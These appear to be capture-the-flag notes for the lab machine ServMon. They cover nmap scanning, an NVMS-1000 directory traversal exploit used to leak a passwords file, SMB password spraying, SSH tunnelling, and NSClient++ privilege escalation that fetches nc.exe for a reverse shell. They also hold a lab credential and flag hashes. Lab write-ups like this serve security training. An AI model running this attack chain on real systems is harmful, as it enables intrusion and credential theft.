Network Scanning
IP=10.10.10.184sudo nmap -T4 -A -v -o nmap --min-rate 1000 $IP
sudo nmap -T4 --script=vuln -v -o vuln --min-rate 1000 $IP
sudo nmap -T4 -A -v -p- -o alltcp --min-rate 1000 $IP
sudo nmap -A -v -p- -o alltcpslow $IP
echo "-----------------------------------------------------"
echo "TCP is done, startng udp (slowwwwww)"
echo "-----------------------------------------------------"
sudo nmap -T4 -sU -A -vv -p- -o udp --min-rate 1000 $IPFTP
Anonymous access is enabled
Two users: Nadine, Nathan
each has a file.
Interesting entries regarding initial access:
- Remove public access to NVMS
searchsploit nvms-1000We see a directory traversal
python2.7 48311.py http://10.10.10.184/ windows/system32/drivers/etc/hosts out.txt
The previous note references where to find creds
lets see if we can leak the file
python2.7 48311.py http://10.10.10.184/ Users/nathan/Desktop/Passwords.txt passThis wasn’t working, trying the other PoC in burp works
Make a password list
check against smb with nxc
nxc smb 10.10.10.184 -u nadine -p pass --shares --local-auth
nadine:L1k3B1gBut7s@W0rkssh is running, lets see if we can log in
ssh nadine@10.10.10.184
13a2b7d3da9dd1186daceb9a640ed297Priv Esc
We can use: windows/local/46802.txt
web panel password
ew2x6SsGTxjRwXOTWe can’t login
Looking at the config file again, we see its only allowing access via localhost
We may be able to use ssh to route our web traffic through the local interface.
ssh -L 8443:127.0.0.1:8443 nadine@10.10.10.184
We can access it locally!
We can login!
Now we can enable:
- CheckExternalScripts - Scheduler
get nc.exe
wget https://github.com/int0x33/nc.exe/blob/master/nc64.exe && mv nc64.exe nc.exedownload to disk
setup a listener
Build script
Now we save the configuration and reload the service:
wait for a shell
This wasn’t working - I tried a million permutations.
Eventually, I found you can run your custom commands via the console instead of waiting for the schedular to execute it.
And we catch a shell
871ec5458cf91db144daf11d89111a40